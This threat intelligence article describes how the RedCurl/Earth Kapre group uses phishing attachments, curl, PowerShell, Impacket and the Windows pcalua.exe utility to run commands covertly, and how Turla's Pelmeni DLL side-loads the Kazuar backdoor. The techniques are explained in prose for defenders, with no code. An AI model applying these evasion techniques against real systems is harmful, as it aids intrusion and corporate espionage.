The Russian-speaking cybercrime group called RedCurl is leveraging a legitimate Microsoft Windows component called the Program Compatibility Assistant (PCA) to execute malicious commands. The Program Compatibility Assistant Service (pcalua.exe) is a Windows service designed to identify and address compatibility issues with older programs. Adversaries can exploit this utility to enable command execution and bypass security restrictions by using it as an alternative command-line interpreter. In this investigation, the threat actor uses this tool to obscure their activities.
RedCurl, which is also called Earth Kapre and Red Wolf, is known to be active since at least 2018, orchestrating corporate cyber espionage attacks against entities located in Australia, Canada, Germany, Russia, Slovenia, the U.K., Ukraine, and the U.S.
Origins and Activities:
- RedCurl is a Russian-speaking hacker group that has been operating since at least 2018.
- Between 2018 and 2020, they carried out at least 26 attacks on private companies.
- The group’s primary objective is to steal internal corporate documentation, including sensitive information and commercial secrets.
- Victims span different sectors, including construction, finance, consulting, retail, insurance, and law, in countries such as the UK, Germany, Canada, Norway, Russia, and Ukraine.
Attack Tactics:
- RedCurl employs phishing campaigns as their primary attack vector.
- They send malicious emails containing attachments (such as .iso and .img files) that lead to successful infections when opened.
- The group demonstrates extensive red teaming skills and can bypass traditional antivirus detection using their own custom malware.
- Their attacks are well-prepared and specifically target organizations for corporate espionage.
Recent Activity:
- In 2021, RedCurl resumed its attacks after a period of inactivity.
- Group-IB, a cybersecurity solution provider, detected their updated arsenal and identified four attacks since the beginning of 2021.
- The group’s success in stealing sensitive corporate data could potentially set a new trend in the cybercrime landscape.
In July 2023, F.A.C.C.T. revealed that a major Russian bank and an Australian company were targeted by the threat actor in November 2022 and May 2023 to pilfer confidential corporate secrets and employee information. The attack chain examined by Trend Micro entails the use of phishing emails containing malicious attachments (.ISO and .IMG files) to activate a multi-stage process that starts with the use of cmd.exe to download a legitimate utility called curl from a remote server, which then acts as a channel to deliver a loader (ms.dll or ps.dll).
The malicious DLL file, in turn, leverages PCA to spawn a downloader process that takes care of establishing a connection with the same domain used by curl to fetch the loader. Also used in the attack is the use of the Impacket open-source software for unauthorized command execution. The connections to Earth Kapre stem from overlaps in the command-and-control (C2) infrastructure as well as similarities with known downloader artifacts used by the group.
"This case underscores the ongoing and active threat posed by Earth Kapre, a threat actor that targets a diverse range of industries across multiple countries. The actor employs sophisticated tactics, such as abusing PowerShell, curl, and Program Compatibility Assistant (pcalua.exe) to execute malicious commands, showcasing its dedication to evading detection within targeted networks,” reported by Trend Micro.
The development comes as the Russian nation-state group known as Turla (aka Iron Hunter, Pensive Ursa, Secret Blizzard, Snake, Uroburos, Venomous Bear, and Waterbug) has begun employing a new wrapper DLL codenamed Pelmeni to deploy the .NET-based Kazuar backdoor. Pelmeni which masquerades as libraries related to SkyTel, NVIDIA GeForce Experience, vncutil, or ASUS is loaded by means of DLL side-loading. Once this spoofed DLL is called by the legitimate software installed on the machine, it decrypts and launches Kazuar.
This article is presented at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com
Weekly Cyber Intelligence Briefings:
- Reporting: https://www. redskyalliance. org/
- Website: https://www. redskyalliance. com/
- LinkedIn: https://www. linkedin. com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://attendee.gotowebinar.com/register/5504229295967742989
Comments